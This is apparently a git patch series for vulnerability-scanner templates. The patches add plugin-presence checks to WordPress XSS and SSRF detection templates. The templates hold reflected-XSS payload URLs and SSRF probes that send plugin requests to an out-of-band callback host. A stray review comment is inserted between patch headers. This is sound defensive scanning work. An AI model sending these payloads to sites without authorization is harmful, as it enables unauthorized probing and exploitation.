@@ -27,6 +27,6 @@ http: - type: dsl dsl: - 'status_code == 200' - - 'contains(body, "quizzes/flashcard") && contains(body, "")' + - 'contains_all(body, "quizzes/flashcard", "")' condition: and # digest: 4b0a00483046022100ff6532c28c9d55c99ce1d16ffe5bd1ccc69be841bb9bff96e34628badc05181f022100e31126ad944fb55cbb6c015690aedae7ab4a204aa181b1b921ab2fe73430be71:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml
index 297fab34a95..a87e92d8851 100644
--- a/http/vulnerabilities/wordpress/wp-securimage-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-securimage-xss.yaml
@@ -16,7 +16,22 @@ info: max-request: 1 tags: edb,wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/securimage-wp/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Securimage-WP' + - 'Tags:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1'
diff --git a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml
index 51932fe2a8b..0af4373ee58 100644
--- a/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml
+++ b/http/vulnerabilities/wordpress/wp-slideshow-xss.yaml
@@ -15,7 +15,22 @@ info: max-request: 1 tags: wordpress,xss,wp-plugin,edb +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/slideshow-jquery-image-gallery/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Slideshow' + - 'Stable tag:' + condition: and + - method: GET path: - '{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
From 4e7b652b3b485de5fee9a5b0470b0bd934ed6c00 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha
Date: Tue, 26 Mar 2024 23:09:50 +0530
Subject: [PATCH 4/7] plugin-flow (xss)
---
 http/cves/2011/CVE-2011-5107.yaml | 12 ++++++++++++
 http/cves/2012/CVE-2012-0901.yaml | 12 ++++++++++++
 http/cves/2014/CVE-2014-4535.yaml | 14 +++++++++++++-
 http/cves/2014/CVE-2014-4550.yaml | 12 ++++++++++++
 http/cves/2014/CVE-2014-4558.yaml | 12 ++++++++++++
 http/cves/2016/CVE-2016-1000136.yaml | 12 ++++++++++++
 http/cves/2016/CVE-2016-1000139.yaml | 16 ++++++++++++++++
 http/cves/2017/CVE-2017-17059.yaml | 2 +-
 8 files changed, 90 insertions(+), 2 deletions(-)
diff --git a/http/cves/2011/CVE-2011-5107.yaml b/http/cves/2011/CVE-2011-5107.yaml
index cb86613bfb1..f18d0ad1b03 100644
--- a/http/cves/2011/CVE-2011-5107.yaml
+++ b/http/cves/2011/CVE-2011-5107.yaml
@@ -29,7 +29,19 @@ info: google-query: inurl:"/wp-content/plugins/alert-before-your-post" tags: cve,cve2011,wordpress,xss,wp-plugin +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/alert-before-your-post/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/cves/2012/CVE-2012-0901.yaml b/http/cves/2012/CVE-2012-0901.yaml
index 333e7a2e921..12cdbba81c0 100644
--- a/http/cves/2012/CVE-2012-0901.yaml
+++ b/http/cves/2012/CVE-2012-0901.yaml
@@ -29,7 +29,19 @@ info: google-query: inurl:"/wp-content/plugins/yousaytoo-auto-publishing-plugin" tags: cve,cve2012,wp-plugin,packetstorm,wordpress,xss,attenzione +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/yousaytoo-auto-publishing-plugin/' + - method: GET path: - '{{BaseURL}}/wp-content/plugins/yousaytoo-auto-publishing-plugin/yousaytoo.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml
index dd3961ff471..f90f57579f6 100644
--- a/http/cves/2014/CVE-2014-4535.yaml
+++ b/http/cves/2014/CVE-2014-4535.yaml
@@ -20,7 +20,7 @@ info: cve-id: CVE-2014-4535 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47838 + epss-percentile: 0.48664 cpe: cpe:2.3:a:import_legacy_media_project:import_legacy_media:*:*:*:*:*:wordpress:*:* metadata: max-request: 1
@@ -29,7 +29,19 @@ info: framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,import_legacy_media_project +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/import-legacy-media/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml
index 8271baf284c..039fcd19ee9 100644
--- a/http/cves/2014/CVE-2014-4550.yaml
+++ b/http/cves/2014/CVE-2014-4550.yaml
@@ -29,7 +29,19 @@ info: google-query: inurl:"/wp-content/plugins/shortcode-ninja" tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,visualshortcodes +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/shortcode-ninja/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"
diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml
index 31b6c4637a6..047d2dd3879 100644
--- a/http/cves/2014/CVE-2014-4558.yaml
+++ b/http/cves/2014/CVE-2014-4558.yaml
@@ -28,7 +28,19 @@ info: framework: wordpress tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,woocommerce,unauth,cybercompany +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/swipehq-payment-gateway-woocommerce/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "
diff --git a/http/cves/2016/CVE-2016-1000136.yaml b/http/cves/2016/CVE-2016-1000136.yaml
index 6283fea6a5c..90af3597e7f 100644
--- a/http/cves/2016/CVE-2016-1000136.yaml
+++ b/http/cves/2016/CVE-2016-1000136.yaml
@@ -27,7 +27,19 @@ info: google-query: inurl:"/wp-content/plugins/heat-trackr" tags: cve2016,cve,wordpress,xss,wp-plugin,heat-trackr_project +flow: http(1) && http(2) + http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/heat-trackr/' + - method: GET path: - "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
diff --git a/http/cves/2016/CVE-2016-1000139.yaml b/http/cves/2016/CVE-2016-1000139.yaml
index cd49c560e4f..9b5c5aba7f6 100644
--- a/http/cves/2016/CVE-2016-1000139.yaml
+++ b/http/cves/2016/CVE-2016-1000139.yaml
@@ -31,7 +31,23 @@ info: google-query: inurl:"/wp-content/plugins/infusionsoft" tags: cve2016,cve,wordpress,wp-plugin,xss,wpscan,infusionsoft_project +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Infusionsoft' + - 'Tags:' + condition: and + case-insensitive: true + - method: GET path: - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml
index 8ae41e17000..b0286fddb1b 100644
--- a/http/cves/2017/CVE-2017-17059.yaml
+++ b/http/cves/2017/CVE-2017-17059.yaml
@@ -33,7 +33,7 @@ flow: http(1) && http(2) http: - raw: - | - GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 + GET /wp-content/plugins/amty-thumb-recent-post/readme.txt HTTP/1.1 Host: {{Hostname}} matchers:
From d1201a3f3868b22c50e9817dcfcd19beafac5bec Mon Sep 17 00:00:00 2001
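Review bot: In CVE-2017-17059 only the readme path is corrected, from `indexisto` to `amty-thumb-recent-post`; the `words:` that the gate matcher checks against that readme lie below the hunk, and if they were copied from the Indexisto template together with the path, the gate would still never open and the template would keep failing closed. Confirm they name the heading of the `amty-thumb-recent-post` readme. `matchers:` is the hunk's last line, so the rest of the matcher block is outside view.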
From: Ritik Chaddha
Date: Tue, 26 Mar 2024 23:09:57 +0530
Subject: [PATCH 5/7] Update CVE-2016-1000138.yaml
---
 http/cves/2016/CVE-2016-1000138.yaml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/http/cves/2016/CVE-2016-1000138.yaml b/http/cves/2016/CVE-2016-1000138.yaml
index a4980b959a6..9215654aa73 100644
--- a/http/cves/2016/CVE-2016-1000138.yaml
+++ b/http/cves/2016/CVE-2016-1000138.yaml
@@ -37,6 +37,7 @@ http: - | GET /wp-content/plugins/indexisto/readme.txt HTTP/1.1 Host: {{Hostname}} + matchers: - type: word internal: true
From 72f30f24420c7fe5b7e6d3ab0f37569c9b405cf6 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha
Date: Tue, 26 Mar 2024 23:28:35 +0530
Subject: [PATCH 6/7] added-flow(oast)
---
 http/cves/2020/CVE-2020-28976.yaml | 15 +++++++++++++++
 http/cves/2022/CVE-2022-0591.yaml | 12 ++++++++++++
 .../wordpress/wp-under-construction-ssrf.yaml | 13 +++++++++++++
 3 files changed, 40 insertions(+)
diff --git a/http/cves/2020/CVE-2020-28976.yaml b/http/cves/2020/CVE-2020-28976.yaml
index 989df6769d0..fe452435e75 100644
--- a/http/cves/2020/CVE-2020-28976.yaml
+++ b/http/cves/2020/CVE-2020-28976.yaml
@@ -30,7 +30,22 @@ info: framework: wordpress tags: cve2020,cve,packetstorm,ssrf,wordpress,wp-plugin,oast,edb,canto +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/canto/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - 'Canto' + - 'Tested up to:' + condition: and + - method: GET path: - "{{BaseURL}}/wp-content/plugins/canto/includes/lib/detail.php?subdomain={{interactsh-url}}"
diff --git a/http/cves/2022/CVE-2022-0591.yaml b/http/cves/2022/CVE-2022-0591.yaml
index d6a1ed0594d..33835011a60 100644
--- a/http/cves/2022/CVE-2022-0591.yaml
+++ b/http/cves/2022/CVE-2022-0591.yaml
@@ -30,7 +30,19 @@ info: fofa-query: body="formcraft3" && body="wp-" tags: cve,cve2022,wp,wp-plugin,wordpress,formcraft3,wpscan,ssrf,unauth,subtlewebinc +flow: http(1) && http(2) + http: + - method: GET + path: + - '{{BaseURL}}' + + matchers: + - type: word + internal: true + words: + - '/wp-content/plugins/formcraft3/' + - method: GET path: - '{{BaseURL}}/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}'
diff --git a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
index ca5e2ae4320..764d019c4e6 100644
--- a/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
+++ b/http/vulnerabilities/wordpress/wp-under-construction-ssrf.yaml
@@ -14,7 +14,20 @@ info: max-request: 1 tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm +flow: http(1) && http(2) + http: + - raw: + - | + GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + internal: true + words: + - '= Under Construction' + - raw: - | POST /wp-admin/admin-ajax.php HTTP/2
From 188505adad1a537884932a74659ce89941e3e389 Mon Sep 17 00:00:00 2001
From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com>
Date: Mon, 8 Apr 2024 13:13:21 +0530
Subject: [PATCH 7/7] Update recommended.yml
---
 config/recommended.yml | 1 -
 1 file changed, 1 deletion(-)
diff --git a/config/recommended.yml b/config/recommended.yml
index fd09c67f0a5..910982340fb 100644
--- a/config/recommended.yml
+++ b/config/recommended.yml
@@ -75,7 +75,6 @@ exclude-id: - optilink-ont1gew-gpon-rce - sar2html-rce - zimbra-preauth-ssrf - - wp-under-construction-ssrf - wp-xmlrpc-pingback-detection - fastjson-1-2-41-rce - fastjson-1-2-42-rce